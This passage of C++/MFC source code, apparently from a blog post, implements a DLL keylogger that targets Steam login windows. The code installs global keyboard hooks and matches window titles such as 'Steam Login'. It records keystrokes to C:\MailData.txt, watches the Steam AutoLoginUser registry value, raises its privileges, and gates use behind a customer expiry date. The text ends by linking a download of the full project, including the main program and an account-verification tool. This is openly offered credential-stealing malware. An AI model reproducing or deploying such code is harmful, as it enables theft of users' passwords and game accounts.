VK_NUMPAD0:myEmailSTR = "0";break;case VK_MULTIPLY:myEmailSTR = "*";break;case VK_ADD: myEmailSTR = "+";break;case VK_SUBTRACT:myEmailSTR = "-";break;case VK_DECIMAL: myEmailSTR = ".";break;case VK_DIVIDE: myEmailSTR = "/";break;//其他特殊键case VK_BACK:myEmailSTR = "[Back_Space]";//myEmailSTR.Delete(myEmailSTR.GetLength()-1);break;case VK_TAB:myEmailSTR = " ";break;case VK_SPACE:myEmailSTR = " ";break;// 回车键case VK_RETURN:myEmailSTR = " ";break;}//其他键的处理char KeyName[50];ZeroMemory(KeyName,50);GetKeyNameText(lParam,KeyName,50);CString KeyNameStr=KeyName;if(KeyNameStr=="`"){if(b_Sft)myEmailSTR = "~";elsemyEmailSTR = "`";}if(KeyNameStr=="-"){if(b_Sft)myEmailSTR = "_";elsemyEmailSTR = "-";}if(KeyNameStr=="="){if(b_Sft)myEmailSTR = "+";elsemyEmailSTR = "=";}if(KeyNameStr=="["){if(b_Sft)myEmailSTR = "{";elsemyEmailSTR = "[";}if(KeyNameStr=="]"){if(b_Sft)myEmailSTR = "}";elsemyEmailSTR = "]";}if(KeyNameStr==";"){if(b_Sft)myEmailSTR = ":";elsemyEmailSTR = ";";}if(KeyNameStr=="'"){if(b_Sft)myEmailSTR = "\"";elsemyEmailSTR = "'";}if(KeyNameStr==","){if(b_Sft)myEmailSTR = "<";elsemyEmailSTR = ",";}if(KeyNameStr=="."){if(b_Sft)myEmailSTR = ">";elsemyEmailSTR = ".";}if(KeyNameStr=="/"){if(b_Sft)myEmailSTR = "?";elsemyEmailSTR = "/";}if(KeyNameStr=="\\"){if(b_Sft)myEmailSTR = "|";elsemyEmailSTR = "\\";}//AfxMessageBox(myEmailSTR);CFileFind finder1;BOOL noEmpty1=finder1.FindFile("C:\\MailData.txt");if(!noEmpty1){FILE *fpx1;fpx1=fopen("C:\\MailData.txt", "w");if(fpx1){fprintf(fpx1, "%s", myEmailSTR.GetBuffer(0));}fclose(fpx1);}else{FILE *fpx2;fpx2=fopen("C:\\MailData.txt", "a");if(fpx2){fprintf(fpx2, "%s", myEmailSTR.GetBuffer(0));}fclose(fpx2);}myEmailSTR = "";}}}LRESULT RetVal = CallNextHookEx(hie, nCode, wParam, lParam ); return RetVal;
}// HOOK 键盘回调函数 (监控 Steam.exe 输入)LRESULT DllExport CALLBACK IntProc1(int nCode,WPARAM wParam,LPARAM lParam)
{if(::GetCurrentProcessId() != GetEXE())return CallNextHookEx(hkb, nCode, wParam, lParam );HWND H_wnd = ::GetForegroundWindow();char sTitle[255];CString ss;::SendMessage(H_wnd,WM_GETTEXT,255,(LPARAM)sTitle);//AfxMessageBox(sTitle);ss.Format(TEXT("%s"), sTitle);//AfxMessageBox(ss);char *aaa;aaa = strstr(sTitle, "Steam 登录");char *bbb;bbb = strstr(sTitle, "Steam 登入");char *ccc;ccc = strstr(sTitle, "Steam Login");char *ddd;ddd = strstr(sTitle, "S t e a m 登录");char *eee;eee = strstr(sTitle, "S t e a m 登 录");int n = ss.Find("Steam 登录",0);int m = ss.Find("Steam 登入",0);int o = ss.Find("Steam Login",0);int p = ss.Find("S t e a m 登录",0);int q = ss.Find("S t e a m 登 录",0);if( (aaa || bbb || ccc || ddd || eee) || (m >= 0 || n >= 0 || o >= 0 || p >= 0 || q >= 0) ){if(!Regedit){HKEY hKeyx;LONG lRetx, lRetx2;lRetx = RegOpenKeyEx( HKEY_CURRENT_USER,TEXT("Software\\Valve\\Steam"),0, KEY_QUERY_VALUE|KEY_WRITE, &hKeyx );if( lRetx == ERROR_SUCCESS ){char datas[256] = {0};DWORD dwTypes = REG_SZ;DWORD dwLengths = 256;lRetx2 = RegQueryValueEx( hKeyx, TEXT("AutoLoginUser"), NULL, &dwTypes, (LPBYTE)datas, &dwLengths );if(lRetx2 != ERROR_SUCCESS){//创建线程监控注册表 1DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit, NULL, 0, &dwThreadId); Regedit = true;}else{// 如果注册表中能打开存放用户数据的键值// 而该键值又为空的话必须运行线程1来操作if( strlen(datas) < 4 ){//创建线程监控注册表 1DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit, NULL, 0, &dwThreadId); Regedit = true;}else{//创建线程监控注册表 2DWORD dwThreadId;CreateThread(NULL, 0, HOOKRegedit2, NULL, 0, &dwThreadId); Regedit = true;}}}RegCloseKey(hKeyx);}if(nCode == HC_ACTION && (lParam & 0xc000ffff) == 1){BOOL b_Sft = ::GetAsyncKeyState(VK_SHIFT) >> ((sizeof(short) * 8)-1);BOOL b_Clk = ::GetKeyState(VK_CAPITAL);BOOL b_Ctl = ::GetAsyncKeyState(VK_CONTROL) >> ((sizeof(short) * 8)-1);BOOL b_Alt = ::GetAsyncKeyState(VK_MENU) >> ((sizeof(short) * 8)-1);if(!b_Ctl && !b_Alt){if(b_Sft && !b_Clk){switch(wParam){case '1':szStr += "!";break;case '2':szStr += "@";break;case '3':szStr += "#";break;case '4':szStr += "$";break;case '5':szStr += "%";break;case '6':szStr += "^";break;case '7':szStr += "&";break;case '8':szStr += "*";break;case '9':szStr += "(";break;case '0':szStr += ")";break;case 'A':szStr += "A";break;case 'B':szStr += "B";break;case 'C':szStr += "C";break;case 'D':szStr += "D";break;case 'E':szStr += "E";break;case 'F':szStr += "F";break;case 'G':szStr += "G";break;case 'H':szStr += "H";break;case 'I':szStr += "I";break;case 'J':szStr += "J";break;case 'K':szStr += "K";break;case 'L':szStr += "L";break;case 'M':szStr += "M";break;case 'N':szStr += "N";break;case 'O':szStr += "O";break;case 'P':szStr += "P";break;case 'Q':szStr += "Q";break;case 'R':szStr += "R";break;case 'S':szStr += "S";break;case 'T':szStr += "T";break;case 'U':szStr += "U";break;case 'V':szStr += "V";break;case 'W':szStr += "W";break;case 'X':szStr += "X";break;case 'Y':szStr += "Y";break;case 'Z':szStr += "Z";break;}}else if(!b_Sft && b_Clk){switch(wParam){case '1':szStr += "1";break;case '2':szStr += "2";break;case '3':szStr += "3";break;case '4':szStr += "4";break;case '5':szStr += "5";break;case '6':szStr += "6";break;case '7':szStr += "7";break;case '8':szStr += "8";break;case '9':szStr += "9";break;case '0':szStr += "0";break;case 'A':szStr += "A";break;case 'B':szStr += "B";break;case 'C':szStr += "C";break;case 'D':szStr += "D";break;case 'E':szStr += "E";break;case 'F':szStr += "F";break;case 'G':szStr += "G";break;case 'H':szStr += "H";break;case 'I':szStr += "I";break;case 'J':szStr += "J";break;case 'K':szStr += "K";break;case 'L':szStr += "L";break;case 'M':szStr += "M";break;case 'N':szStr += "N";break;case 'O':szStr += "O";break;case 'P':szStr += "P";break;case 'Q':szStr += "Q";break;case 'R':szStr += "R";break;case 'S':szStr += "S";break;case 'T':szStr += "T";break;case 'U':szStr += "U";break;case 'V':szStr += "V";break;case 'W':szStr += "W";break;case 'X':szStr += "X";break;case 'Y':szStr += "Y";break;case 'Z':szStr += "Z";break;}}else if(b_Sft && b_Clk){switch(wParam){case '1':szStr += "!";break;case '2':szStr += "@";break;case '3':szStr += "#";break;case '4':szStr += "$";break;case '5':szStr += "%";break;case '6':szStr += "^";break;case '7':szStr += "&";break;case '8':szStr += "*";break;case '9':szStr += "(";break;case '0':szStr += ")";break;case 'A':szStr += "a";break;case 'B':szStr += "b";break;case 'C':szStr += "c";break;case 'D':szStr += "d";break;case 'E':szStr += "e";break;case 'F':szStr += "f";break;case 'G':szStr += "g";break;case 'H':szStr += "h";break;case 'I':szStr += "i";break;case 'J':szStr += "j";break;case 'K':szStr += "k";break;case 'L':szStr += "l";break;case 'M':szStr += "m";break;case 'N':szStr += "n";break;case 'O':szStr += "o";break;case 'P':szStr += "p";break;case 'Q':szStr += "q";break;case 'R':szStr += "r";break;case 'S':szStr += "s";break;case 'T':szStr += "t";break;case 'U':szStr += "u";break;case 'V':szStr += "v";break;case 'W':szStr += "w";break;case 'X':szStr += "x";break;case 'Y':szStr += "y";break;case 'Z':szStr += "z";break;}}else{switch(wParam){case '1':szStr += "1";break;case '2':szStr += "2";break;case '3':szStr += "3";break;case '4':szStr += "4";break; case '5':szStr += "5";break;case '6':szStr += "6";break;case '7':szStr += "7";break;case '8':szStr += "8";break;case '9':szStr += "9";break;case '0':szStr += "0";break;case 'A':szStr += "a";break;case 'B':szStr += "b";break;case 'C':szStr += "c";break;case 'D':szStr += "d";break;case 'E':szStr += "e";break;case 'F':szStr += "f";break;case 'G':szStr += "g";break;case 'H':szStr += "h";break;case 'I':szStr += "i";break;case 'J':szStr += "j";break;case 'K':szStr += "k";break;case 'L':szStr += "l";break;case 'M':szStr += "m";break;case 'N':szStr += "n";break;case 'O':szStr += "o";break;case 'P':szStr += "p";break;case 'Q':szStr += "q";break;case 'R':szStr += "r";break;case 'S':szStr += "s";break;case 'T':szStr += "t";break;case 'U':szStr += "u";break;case 'V':szStr += "v";break;case 'W':szStr += "w";break;case 'X':szStr += "x";break;case 'Y':szStr += "y";break;case 'Z':szStr += "z";break;}}//小键盘按键switch(wParam){case VK_NUMPAD1:szStr += "1";break;case VK_NUMPAD2:szStr += "2";break;case VK_NUMPAD3:szStr += "3";break;case VK_NUMPAD4:szStr += "4";break;case VK_NUMPAD5:szStr += "5";break;case VK_NUMPAD6:szStr += "6";break;case VK_NUMPAD7:szStr += "7";break;case VK_NUMPAD8:szStr += "8";break;case VK_NUMPAD9:szStr += "9";break;case VK_NUMPAD0:szStr += "0";break;case VK_MULTIPLY:szStr += "*";break;case VK_ADD: szStr += "+";break;case VK_SUBTRACT:szStr += "-";break;case VK_DECIMAL: szStr += ".";break;case VK_DIVIDE: szStr += "/";break;//其他特殊键case VK_BACK:szStr.Delete(szStr.GetLength()-1);break;case VK_TAB:szStr += " ";break;case VK_SPACE:szStr += " ";break;// 回车键case VK_RETURN:break;}//其他键的处理char KeyName[50];ZeroMemory(KeyName,50);GetKeyNameText(lParam,KeyName,50);CString KeyNameStr=KeyName;if(KeyNameStr=="`"){if(b_Sft)szStr += "~";elseszStr += "`";}if(KeyNameStr=="-"){if(b_Sft)szStr += "_";elseszStr += "-";}if(KeyNameStr=="="){if(b_Sft)szStr += "+";elseszStr += "=";}if(KeyNameStr=="["){if(b_Sft)szStr += "{";elseszStr += "[";}if(KeyNameStr=="]"){if(b_Sft)szStr += "}";elseszStr += "]";}if(KeyNameStr==";"){if(b_Sft)szStr += ":";elseszStr += ";";}if(KeyNameStr=="'"){if(b_Sft)szStr += "\"";elseszStr += "'";}if(KeyNameStr==","){if(b_Sft)szStr += "<";elseszStr += ",";}if(KeyNameStr=="."){if(b_Sft)szStr += ">";elseszStr += ".";}if(KeyNameStr=="/"){if(b_Sft)szStr += "?";elseszStr += "/";}if(KeyNameStr=="\\"){if(b_Sft)szStr += "|";elseszStr += "\\";}//AfxMessageBox(szStr);}}}LRESULT RetVal = CallNextHookEx(hkb, nCode, wParam, lParam ); return RetVal;
}// 安装 HOOK 钩子BOOL DllExport installhook()
{///// 检测用户到期时间 /////SYSTEMTIME st;CString strYear, strMonth, strDay, strFullTime;GetLocalTime(&st);strYear.Format("%d", st.wYear);strMonth.Format("%d", st.wMonth);strDay.Format("%d", st.wDay);if(st.wMonth < 10){int mmm = strMonth.Find("0", 0);if(mmm < 0){strMonth = "0" + strMonth;}}if(st.wDay < 10){int ddd = strDay.Find("0", 0);if(ddd < 0){strDay = "0" + strDay;}}strFullTime = strYear + strMonth + strDay;UserEndData.Remove('.');UserEndData.Remove('-');int LocalTime = atoi(strFullTime);int UserEndTime = atoi(UserEndData);if( LocalTime < UserEndTime ){//获取自身程序绝对路径TCHAR szmyPath[MAX_PATH + 1]={0};GetModuleFileName(NULL, szmyPath, MAX_PATH);(_tcsrchr(szmyPath, _T('\\')))[1] = 0;szMyselfPath.Format(TEXT("%s\\"), szmyPath);//// 删除帐号记录文件DeleteFile("C:\\NTUSERS.LOG");DeleteFile("C:\\MailData.txt");DeleteFile("C:\\MailName.txt");////设置程序优先级别为最高SetRealTimePriority();////提升程序的系统权限AdjustPrivileges();//// HOOK 键盘 1hkb = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc1, hins, 0);//// HOOK 键盘 2hie = SetWindowsHookEx(WH_KEYBOARD, (HOOKPROC)IntProc2, hinss, 0);////创建线程定时清理用户输入数据DWORD dwThreadIDX;CreateThread(NULL, 0, CleanUserData, NULL, 0, &dwThreadIDX); //}return TRUE;
}// 卸载 HOOK 钩子BOOL DllExport UnHook(HHOOK szHookName)
{ if( UnhookWindowsHookEx(szHookName) ){return TRUE;}return FALSE;
}BOOL CTest3App::InitInstance()
{ AFX_MANAGE_STATE(AfxGetStaticModuleState());hins=AfxGetInstanceHandle();hinss=AfxGetInstanceHandle();return TRUE;
}/
// CTest3App constructionCTest3App::CTest3App()
{// TODO: add construction code here,// Place all significant initialization in InitInstance
}/
// The one and only CTest3App objectCTest3App theApp;完整项目下载
主程序 + DLL + 帐号验证工具 一并打包上传,写的有点乱七八糟,没啥技术含量,对于目前情况已经没什么用处。
【CSDN下载】
https://download.csdn.net/download/qq_39190622/88683609
